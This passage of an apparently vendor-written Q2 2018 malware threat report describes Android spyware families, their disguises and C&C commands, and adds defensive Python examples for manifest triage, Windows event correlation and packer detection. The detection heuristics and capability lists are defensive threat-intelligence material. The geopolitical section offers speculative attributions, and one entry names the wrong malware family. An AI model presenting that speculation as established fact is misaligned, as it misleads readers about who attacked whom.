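      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>"""

BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Notes">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
  </application>
</manifest>"""

if __name__ == "__main__":
    for label, text in (("spy-like", SPY_LIKE_MANIFEST), ("benign", BENIGN_MANIFEST)):
        print(label, triage_manifest(text))
```

The score is only a sorting key for a queue of samples; the findings list is what an analyst reads. Legitimate messaging or backup apps request several of these permissions too, so the result is a prompt to look closer, not a verdict.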
4.1.3 MikeSpy
Some spyware samples specifically hunt for messenger data, like the next digital spook, MikeSpy.
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflages itself as a Virtual Girlfriend application. But instead of a girlfriend, it has a bundle of malicious abilities:
Takes control of the Bluetooth adapter
Extracts data about accounts, contact details and installed apps
Extracts data from the WhatsApp message DB and related keys
Uploads collected data to the cybercriminals' server via FTP
4.1.4 Xloader
The next spyware, Xloader, combines spying with a purposeful hunt for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.
Version-1 to Version-3: FaceBook, Chrome
Disguises of Xloader
After infection, Xloader connects to its C&C server and executes the following commands:
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs
Extract contacts details
Set Wi-Fi to always on
Version 2 can execute additional commands:
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access a location specified by the attackers
Make recordings
Make calls
4.1.5 Stalker Spy
The next malware in the row is Stalker Spy. As you can see, it is the champion in the number of masks it puts on to deceive users.
App Distribution
FlexiSpy, MBackup
HelloSpy, ProActivator, TActivator, Setting, Wi-Fi Settings, ردیاب اسپای ھاید, Keylogger, System Service
Mobile Spy
随意代挂, Subway Surfers, 라이브성인방송, Мобильный антивирус, droidgetlogevent, SmartcardService, Cheats Z
CloudAgent, New Insta Follow, Android CJ 대한통운 택배, 余生代挂APP, Basic Daydreams, SystemWifiService, Samplecom, мобильный клиент, Asa刷钻
Disguises of Stalker Spy
In addition to the usual must-have spyware set, Xloader can turn on the microphone remotely on the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.
4.1.6 Mystery Bot
The next malware is much more than a spy. The first version of Mystery Bot combines spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it a spy with a "007 license".
Version 1: Adobe Flash Player
Version 2: Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player. Below is a list of some of the commands that the malware can execute on your device:
Send_SMS - extract SMS content and send it to the C&C server
Send_USSD - send the USSD to the C&C server
Gethistory - monitor browser history
Start_AllApp - gather info about installed applications
Send_call - set the Intent action to call
Forward_call - forward incoming calls
ResForward_call - reset call forwarding
Go_Smsmnd - delete SMS content
Go_GetAlls - get SMS history
Dell_sms - delete SMS content in a conversation
Send_spam - send spam SMS
Start_Inject - call the injectors class
4.1.7 FakeSpy
FakeSpy also has many masks, which you can see in the screenshot.
佐川急便, 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.
Here are some commands from its Command and Control server:
contacts - get contact details and email id
Mute - set action to mute
Mms - get MMS content
info - get device information
4.1.8 RedAlert
RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.
Version 1: EbookReader Update Flash Player Android Update WhatsApp Viber
Version 2: Update Google Market, Flash Player, Tactic, FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:
de.postbank.finanzassistent
pl.mbank
aibibankandroid
The second version can block access to some websites, including Google Chrome, Google Play store, Gmail and YouTube.
4.1.9 Hero Rat
The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party app stores, social networks and messengers to spread.
Version 1
CloudVPN, MyIrancel, Mtproto, زیـــــبانـــــویس, تلگرام ھمھ کاره
Proxy, دوست یاب, Telegram Ton
شارژ رایگان بگیر, App Master, Anti Rat, PlatformA, فالورگیر نامحدود, اینترنت رایگان
Disguises of Hero Rat
Its code is available on a Telegram hacking channel. Notably, it is sold in three options: bronze, silver and gold.
After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts its spying activity. It steals text messages and audio records, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.
Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get free Followers and Telegram versions for the Iranian market.
4.1.10 Sonvpay
The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.
Version 1
Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot
Reccoder-Call, QRCodeBar Scanner APK
Let me love you ringtone, Iphone Ringtone, Night light
Beauty camera-Photo editor, Shape of you ringtone
Disguises of Sonvpay
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip" option. If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.
It comes to victims in the variety of disguises listed above.
4.1.11 CoinHive
And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of them upgrading its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.
Version-1: Netflix Hack, Instagram Hack
Version-2: TSF Launcher
Version-3: Android Service, PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via... another cryptominer, named CoinMiner.
How is that possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to use their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim too: thief robbing thief.
This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.
4.2 Android Malware Catalogued by Month
Below you will find detailed statistics on Android-targeted malware by month.
4.2.1 April 2018
Android-targeted malware in April
4.2.2 May 2018
Android-targeted malware in May
4.2.3 June 2018
Android-targeted malware in June
5 Malware in Q2 2018: The Big Picture
Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms
A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms
This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.
Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.
The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.
And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms
A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses them from a local area network (LAN) or company intranet.
In Q2 2018, Allaple was the most common Net Worm detected; Microsoft describes it as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.
The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms
Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.
This quarter the most common Email Worm by far was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms
A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects "exe" and "scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.
This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology, due to the malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
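The behavior attributed to Starter above (create an account, then put it in the administrators group) leaves a clean trail in the Windows Security log: event 4720 for the account creation and 4732 for the group addition. Correlating the two within a short window is a standard detection. The following is an added example written for this page, not Comodo's code and not a signature for the Starter family. It assumes the events have already been exported as dictionaries with the schema field names; the five records are constructed for the demo, and the group is matched on the well-known SID of BUILTIN\Administrators (S-1-5-32-544) so that localized group names do not matter.

```python
"""Correlate 4720 (account created) with 4732 (added to Administrators).
Added example; the event records below are constructed."""
from datetime import datetime, timedelta

# Constructed sample records (field names follow the Windows event schema).
EVENTS = [
    {"EventID": 4720, "TimeCreated": "2018-06-02T09:15:10", "SubjectUserName": "svc_backup",
     "TargetUserName": "svc_remote", "TargetSid": "S-1-5-21-1111-2222-3333-1105"},
    {"EventID": 4732, "TimeCreated": "2018-06-02T09:15:12", "SubjectUserName": "svc_backup",
     "TargetUserName": "Administrators", "TargetSid": "S-1-5-32-544",
     "MemberSid": "S-1-5-21-1111-2222-3333-1105"},
    {"EventID": 4720, "TimeCreated": "2018-06-02T11:02:41", "SubjectUserName": "it.admin",
     "TargetUserName": "j.doe", "TargetSid": "S-1-5-21-1111-2222-3333-1106"},
    {"EventID": 4732, "TimeCreated": "2018-06-02T11:03:05", "SubjectUserName": "it.admin",
     "TargetUserName": "Remote Desktop Users", "TargetSid": "S-1-5-32-555",
     "MemberSid": "S-1-5-21-1111-2222-3333-1106"},
    {"EventID": 4732, "TimeCreated": "2018-06-03T08:00:00", "SubjectUserName": "it.admin",
     "TargetUserName": "Administrators", "TargetSid": "S-1-5-32-544",
     "MemberSid": "S-1-5-21-1111-2222-3333-1001"},
]

# BUILTIN\Administrators; extend with domain admin group SIDs as needed.
ADMIN_GROUP_SIDS = {"S-1-5-32-544"}


def _ts(event):
    return datetime.strptime(event["TimeCreated"], "%Y-%m-%dT%H:%M:%S")


def correlate_new_admins(events, window=timedelta(minutes=10)):
    """Report accounts that were created and made admin within `window`.

    A 4732 for a long-standing account (SID ...-1001 above) has no matching
    4720 and is ignored; it belongs to a different rule (any admin change).
    """
    created = {}
    for ev in events:
        if ev["EventID"] == 4720:
            created[ev["TargetSid"]] = ev
    alerts = []
    for ev in events:
        if ev["EventID"] != 4732 or ev["TargetSid"] not in ADMIN_GROUP_SIDS:
            continue
        origin = created.get(ev["MemberSid"])
        if origin is None:
            continue
        delta = _ts(ev) - _ts(origin)
        if timedelta(0) <= delta <= window:
            alerts.append({
                "account": origin["TargetUserName"],
                "sid": ev["MemberSid"],
                "created_by": origin["SubjectUserName"],
                "elevated_by": ev["SubjectUserName"],
                "group": ev["TargetUserName"],
                "seconds_between": int(delta.total_seconds()),
            })
    return alerts


if __name__ == "__main__":
    for alert in correlate_new_admins(EVENTS):
        print(alert)
```

The window is deliberately short: help-desk provisioning also creates accounts and adjusts groups, but rarely within seconds and rarely into Administrators, so a tight window plus the admin-group filter keeps the rule quiet while still catching the create-then-elevate sequence.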
The bubble chart shows that Germany (de) was the No. 1 country for Trojans, according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.
5.2.4 Exploits
Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (pdf) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware
In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor
Constructors are applications that can be used to automatically create malware files.
For Q2, Alamar was the No. 1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.
In Q2, Germany (de) was the top country of detection for Constructors.
And this timeline shows not only that Germany had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers
Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.
MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
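Packed executables of the kind described here are recognizable before any unpacking: UPX leaves section names that start with "UPX", the first of those sections is empty on disk but large in memory (it is where the unpacked code will land), and the section holding the compressed image has near-random byte statistics. The following is an added example written for this page, not Comodo's code and unrelated to the UPX project's own implementation. It assembles a minimal PE32 image in memory (constructed, not a real binary) so that it runs offline; a real file's bytes can be handed to scan_pe() instead. The 7.0 bits-per-byte entropy threshold is an assumed heuristic, not a standard.

```python
"""Packer triage for PE files: section-name, raw-vs-virtual-size and
entropy checks. Added example; the PE images below are constructed."""
import hashlib
import math
import struct
from collections import Counter


def shannon_entropy(data):
    """Bits of entropy per byte; near 8.0 means compressed or encrypted data."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((c / total) * math.log2(c / total) for c in Counter(data).values())


def pseudo_random_bytes(length, seed=b"packed"):
    """Deterministic high-entropy filler standing in for compressed code."""
    out, block = bytearray(), seed
    while len(out) < length:
        block = hashlib.sha256(block).digest()
        out.extend(block)
    return bytes(out[:length])


def build_pe(sections):
    """Assemble a minimal PE32 image from (name, raw_bytes[, virtual_size]).

    Only the fields the scanner reads are meaningful; everything else is zero.
    """
    e_lfanew, opt_size = 0x40, 0xE0
    raw_ptr = e_lfanew + 4 + 20 + opt_size + 40 * len(sections)
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = struct.pack("<H", 0x10B) + b"\x00" * (opt_size - 2)
    headers, payload = b"", b""
    for name, data, *rest in sections:
        vsize = rest[0] if rest else len(data)
        headers += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\x00"),
                               vsize, 0x1000, len(data), raw_ptr, 0, 0, 0, 0, 0x60000020)
        raw_ptr += len(data)
        payload += data
    return dos + b"PE\x00\x00" + coff + opt + headers + payload


def scan_pe(data, entropy_threshold=7.0):
    """Return one record per section with the packing indicators it trips."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    sec_off = e_lfanew + 24 + opt_size  # signature + COFF header + optional header
    results = []
    for i in range(nsec):
        name, vsize, _vaddr, rawsize, rawptr = struct.unpack_from(
            "<8sIIII", data, sec_off + 40 * i)
        name = name.rstrip(b"\x00").decode("ascii", "replace")
        ent = shannon_entropy(data[rawptr:rawptr + rawsize])
        reasons = []
        if name.upper().startswith("UPX"):
            reasons.append("UPX section name")
        if ent > entropy_threshold:
            reasons.append("high entropy")
        if rawsize == 0 and vsize > 0:
            reasons.append("empty on disk but large in memory (unpack target)")
        results.append({"name": name, "entropy": round(ent, 2), "indicators": reasons})
    return results


def looks_packed(results):
    return any(r["indicators"] for r in results)


# Constructed images: one laid out like a UPX-packed file, one plain.
PACKED_IMAGE = build_pe([
    ("UPX0", b"", 0x20000),
    ("UPX1", pseudo_random_bytes(8192)),
    (".rsrc", b"resource data " * 256),
])
PLAIN_IMAGE = build_pe([(".text", b"\x55\x8b\xec\x83\xec\x10" * 1000)])

if __name__ == "__main__":
    for label, image in (("packed", PACKED_IMAGE), ("plain", PLAIN_IMAGE)):
        print(label, looks_packed(scan_pe(image)), scan_pe(image))
```

A modified packer such as the MUPX family described above will usually rename its sections, which is why the size and entropy indicators matter more than the name check; a section that is empty on disk yet large in memory is hard to disguise without breaking the unpacking stub.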
In Q2 2018, Russia was the No. 1 home to malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, in a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous, but still something to be aware of.
5.4 Low Threat Malware: Applications
In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are No. 2 and No. 3 respectively.
This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical Analysis
In this section let's examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the No. 1 malware family for each Vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik: the New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.
In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services – both foreign and domestic – were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities – from social activities to business, politics or national security affairs – are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information – or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's virus and trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike – by far – occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa – precisely where the summit was scheduled to take place.
8. Conclusions
In Q2, Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in its delivery method, more sophisticated in persistence and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.
